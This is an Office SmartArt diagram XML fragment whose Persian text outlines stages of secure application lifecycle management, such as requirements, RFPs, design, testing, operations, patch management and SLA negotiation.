    <dgm:pt modelId="{3687B3A2-BC72-4556-9C2C-B0C926C2E81B}" type="parTrans" cxnId="{0A5B2A7C-265C-4DF8-9906-54FDC126372F}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3DB04E3A-36F2-4339-A8E2-702D5264B71A}" type="sibTrans" cxnId="{0A5B2A7C-265C-4DF8-9906-54FDC126372F}">
      <dgm:prSet/>
      <dgm:spPr/>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t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>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t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>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t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>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t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{BBB13087-447B-294F-AFB1-D3712B8353B8}" type="presOf" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E7DA40D3-122B-437D-A6EC-7D1EDA40ABE0}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{64D9E6A0-3812-42C8-8434-32DCF505AAE6}" srcOrd="3" destOrd="0" parTransId="{B070B49E-4EF7-4FAC-9495-62AC78A1F012}" sibTransId="{16A765A2-4DAD-4A3C-96AF-79B6295E2627}"/>
    <dgm:cxn modelId="{4ADA900F-BB15-4B38-BF44-9583F1143310}" type="presOf" srcId="{20FB68AB-18A5-428E-BC33-7389C147E760}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1D33E389-58B7-1142-A6BD-8178E5656980}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="0"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F7DC9075-BDCA-4D48-8432-877C81C65D9C}" type="presOf" srcId="{715E4EE0-48DC-4CD7-A61E-076653D8895C}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{16C3DAB8-EAB9-47D7-BF41-72B0AB6F1502}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{ED5CD133-6F9F-4947-A134-0AD32930A62D}" srcOrd="4" destOrd="0" parTransId="{055D5AA0-A965-4319-96E0-F718D0A7B1A2}" sibTransId="{78074B42-C8F1-48F3-9ABE-E5FDE5DA75F2}"/>
    <dgm:cxn modelId="{46C9AF68-6F9E-4CBD-BA6A-9D011880B69D}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{3CCD256B-714D-4CF1-B838-882C2ECEC97A}" srcOrd="2" destOrd="0" parTransId="{FF72B059-C42D-4F7E-BFD1-EEB9A9F077F6}" sibTransId="{6311BE1C-9630-42DA-8BA2-70476EF46993}"/>
    <dgm:cxn modelId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" srcOrd="3" destOrd="0" parTransId="{7BC25BDC-3278-4082-B675-15E8A5144241}" sibTransId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}"/>
    <dgm:cxn modelId="{34EBD5D3-8C5C-4C7E-99AB-97EB9FDE3821}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{C17C8C25-FB04-4144-9BC4-2AA98FD20C15}" srcOrd="1" destOrd="0" parTransId="{934F0D0A-0534-4C1F-B87F-A777692630FC}" sibTransId="{6637210C-FE8B-4A3B-817E-93C573306F8C}"/>
    <dgm:cxn modelId="{99A0BECD-C0EB-442E-A14E-115C6C2004C6}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}" srcOrd="2" destOrd="0" parTransId="{F2853B7C-C640-407B-AE16-3B6A7DC44BF1}" sibTransId="{BC7E3830-1E0B-47C9-BCFB-30E22DBC39D8}"/>
    <dgm:cxn modelId="{C2DC27EF-6BCD-7441-AED6-06191BA94EBD}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}"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864B4CCA-2183-4B9B-AD89-D3E572F1DF20}" type="presOf" srcId="{CA778889-59E2-45DA-95C5-34CB3C4E880F}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6A3585BA-CA15-D445-B363-69657B2B32CF}" type="presOf" srcId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3348DCD3-A003-4F98-8D55-26E86CF103FE}" type="presOf" srcId="{ED5CD133-6F9F-4947-A134-0AD32930A62D}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{037BDB8F-830F-44B2-9861-7E6A03948B87}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" srcOrd="2" destOrd="0" parTransId="{D596540A-BB15-4E6E-8AD1-6C9E49AFC4B6}" sibTransId="{D74C2B73-3ED0-4D65-BFF8-1F8F86CFC71F}"/>
    <dgm:cxn modelId="{5B471791-B1D8-6F41-BFB9-9F219E74198D}" type="presOf" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{486D908C-1B5F-4195-ABF2-43708D29D28E}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{715E4EE0-48DC-4CD7-A61E-076653D8895C}" srcOrd="2" destOrd="0" parTransId="{CC737E6D-22F1-493E-AECB-C1E0DA191034}" sibTransId="{AF93B450-66BE-4D5C-8260-6A705965BEB4}"/>
    <dgm:cxn modelId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" srcOrd="4" destOrd="0" parTransId="{FFBE90CC-07EB-498E-9CCD-E2662DC23296}" sibTransId="{A003834B-8490-4CC6-B531-19539D19FBD4}"/>
    <dgm:cxn modelId="{08132D1A-D62B-4C46-A43E-5429B82C6622}" type="presOf" srcId="{42C52315-0953-4F62-A146-67E6F7B01745}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}"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9A63BADE-E25A-48FB-9671-EE7EAB6807F3}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" srcOrd="0" destOrd="0" parTransId="{EE435F92-04EC-45B6-94A8-51EF1EBF242B}" sibTransId="{1EBA831D-0061-461C-A1EF-795466184E12}"/>
    <dgm:cxn modelId="{2C53057E-90A2-42AE-9387-74DE727A3730}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{CA778889-59E2-45DA-95C5-34CB3C4E880F}" srcOrd="1" destOrd="0" parTransId="{C5B88E36-8286-4221-8E7C-A0F004EB702C}" sibTransId="{CF375FEF-38A6-4AFD-96BF-4941E2177BF8}"/>
    <dgm:cxn modelId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" srcOrd="0" destOrd="0" parTransId="{730D1E5B-ACEC-4A48-BF36-5E6B1CC715C0}" sibTransId="{EDDED477-A083-4E27-87C4-9B144EEE4A9C}"/>
    <dgm:cxn modelId="{4AAFEA1C-0D0F-B34B-A23B-00BCE0C7AB80}" type="presOf" srcId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8C4B2002-8489-4D51-9DD3-DCE8D7CF38FA}" type="presOf" srcId="{1C80556B-7D43-4F65-B649-59AC4253CE24}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{337F4770-8922-4533-89E2-1AA19F7E4242}" type="presOf" srcId="{3CCD256B-714D-4CF1-B838-882C2ECEC97A}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2"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28C42FA2-107F-4B00-B918-892614438198}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{2268AA8B-F97B-4EC1-85A7-3EA5A2360FDF}" srcOrd="1" destOrd="0" parTransId="{4AC97F6D-FFEF-4320-9B61-C29EDFABD681}" sibTransId="{39AC3042-625E-43FC-AE8D-E50A542BF414}"/>
    <dgm:cxn modelId="{E477C266-8354-2E4E-B998-1968C3E9AAC3}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{ECB23B71-4CE1-46A6-A504-A7D7B9975CE0}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{1C80556B-7D43-4F65-B649-59AC4253CE24}" srcOrd="3" destOrd="0" parTransId="{8C94B431-CF1B-4AA8-BBF8-B1EAF57B80A8}" sibTransId="{E5476E44-C7FC-4021-A2BD-826EB9E59B5A}"/>
    <dgm:cxn modelId="{4ABBBB06-742D-4792-8EAD-BF376D80C5D1}" type="presOf" srcId="{64D9E6A0-3812-42C8-8434-32DCF505AAE6}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EA88B819-0C50-2040-9AE6-390D3F7E426F}" type="presOf" srcId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BF1F2E0D-E3A5-4826-A426-0A6E2EF75B44}" type="presOf" srcId="{C17C8C25-FB04-4144-9BC4-2AA98FD20C15}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{55E55943-16D9-4BB4-98C3-E598BBC5C229}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{9E70AE55-65DA-4A08-9713-4DBDBC4D206F}" srcOrd="2" destOrd="0" parTransId="{7AAEEFEC-0B2B-405D-8E9D-8681C8654E47}" sibTransId="{FBB497BE-1BFE-4117-B417-D27BA1850B32}"/>
    <dgm:cxn modelId="{F8C64B7F-B60A-9741-85BE-D7EA2B668159}" type="presOf" srcId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{68BBB4AA-3E44-F24F-96B7-4A0196C78FDE}" type="presOf" srcId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="2"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BA577156-9B5D-42CB-A944-43B0BD97F098}" type="presOf" srcId="{2268AA8B-F97B-4EC1-85A7-3EA5A2360FDF}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1"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9350ADB8-FF6C-48F4-876E-1EF8C7F1E410}" type="presOf" srcId="{9E70AE55-65DA-4A08-9713-4DBDBC4D206F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}"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8BD9752E-5684-44AB-A79B-A1309D1904E4}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{42C52315-0953-4F62-A146-67E6F7B01745}" srcOrd="1" destOrd="0" parTransId="{D25673F9-0FE4-4220-AC9C-8304C2F13798}" sibTransId="{49FA421C-7FA6-45DB-9023-802CE529E262}"/>
    <dgm:cxn modelId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" srcOrd="1" destOrd="0" parTransId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" sibTransId="{D22B1E2D-9241-472F-8A9E-565E70887137}"/>
    <dgm:cxn modelId="{0A5B2A7C-265C-4DF8-9906-54FDC126372F}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{20FB68AB-18A5-428E-BC33-7389C147E760}" srcOrd="1" destOrd="0" parTransId="{3687B3A2-BC72-4556-9C2C-B0C926C2E81B}" sibTransId="{3DB04E3A-36F2-4339-A8E2-702D5264B71A}"/>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fa-IR" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>مدیریت منابع و نیازها</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algn="just" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>جمع آوری و مذاکره در مورد شرایط کسب و کار برای یک برنامه با کسب و کار، از جمله الزامات حفاظت در مورد محرمانه بودن، صحت، صحت و در دسترس بودن تمام دارایی های داده ها و منطق کسب و کار مورد انتظار.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>درخواست برای پروپوزال</a:t>
          </a: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(RFP) </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> و قرارداد</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fa-IR" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>طراحی و نقشه</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algn="just" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>برنامه ریزی و طراحی با برنامه نویسان و سهامداران داخلی مذاکره کنید، برای مثال متخصصین امنیتی.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" strike="sngStrike" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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fa-IR" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>سیستم های امتیازدهی</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algn="just" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>عملیات باید شامل دستورالعمل هایی برای مدیریت امنیت برنامه (مانند مدیریت پچ) باشد.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" strike="sngStrike" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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algn="just" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>هر گونه اطلاعات مورد نیاز باید بایگانی شود. تمام داده های دیگر باید ایمن پاک شود.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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fa-IR" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>تست گسترش و گستردن</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algn="just" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>شرایط لازم را با توسعه دهندگان داخلی یا خارجی، از جمله دستورالعمل ها و الزامات امنیتی مربوط به برنامه امنیتی خود، به عنوان مثال </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>SDLC، </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>بهترین شیوه ها.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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fa-IR" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>مدیریت عملیات ها و تغییرات</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1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>راه اندازی امن برنامه، رابط ها و تمام اجزای مورد نیاز، از جمله مجوزهای لازم را به صورت خودکار انجام دهید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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0A1A4285-8789-4883-9873-2CE461E20B2B}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>الزامات فنی را از جمله الزامات امنیتی عملکردی و غیرمستقیم تهیه کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{81515535-BE32-4056-AE26-429DBC3E6AEC}" type="parTrans" cxnId="{905BD726-97CB-44EC-B09E-F7CD8E5DC7B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D648A13B-A4B6-4B07-A44A-AB5FE92525AB}" type="sibTrans" cxnId="{905BD726-97CB-44EC-B09E-F7CD8E5DC7B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20A2BCCE-1134-49FE-8523-9224BDFD1A75}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>برنامه ریزی و مذاکره بر بودجه که شامل تمام جنبه های طراحی، ساخت، آزمایش و عملیات، از جمله فعالیت های امنیتی است.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{96A06128-5F67-4381-ABD8-785266A75B00}" type="parTrans" cxnId="{8077D3D4-26A3-4DE1-8025-E9B42F7580EE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6274C05-97F9-4D7A-8752-7C0109DFF23C}" type="sibTrans" cxnId="{8077D3D4-26A3-4DE1-8025-E9B42F7580EE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FC4CE9E7-6DB1-4F94-9B3E-64A9F086639F}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>برآورده کردن تمام الزامات فنی، از جمله مرحله برنامه ریزی و طراحی، را ارزیابی کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A0979CFD-8DF5-4EE3-95FE-8280E18E8BB2}" type="parTrans" cxnId="{71620BC4-BCFE-49BB-8DBD-2B2ABF2B5658}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{54059F94-92A5-437E-960B-855F041FC425}" type="sibTrans" cxnId="{71620BC4-BCFE-49BB-8DBD-2B2ABF2B5658}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0EAE8272-902D-4CEC-A367-E10DDDD0F34F}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>مذاکره با تمام شرایط فنی، از جمله طراحی، امنیت، و موافقت نامه های سطح خدمات </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0">
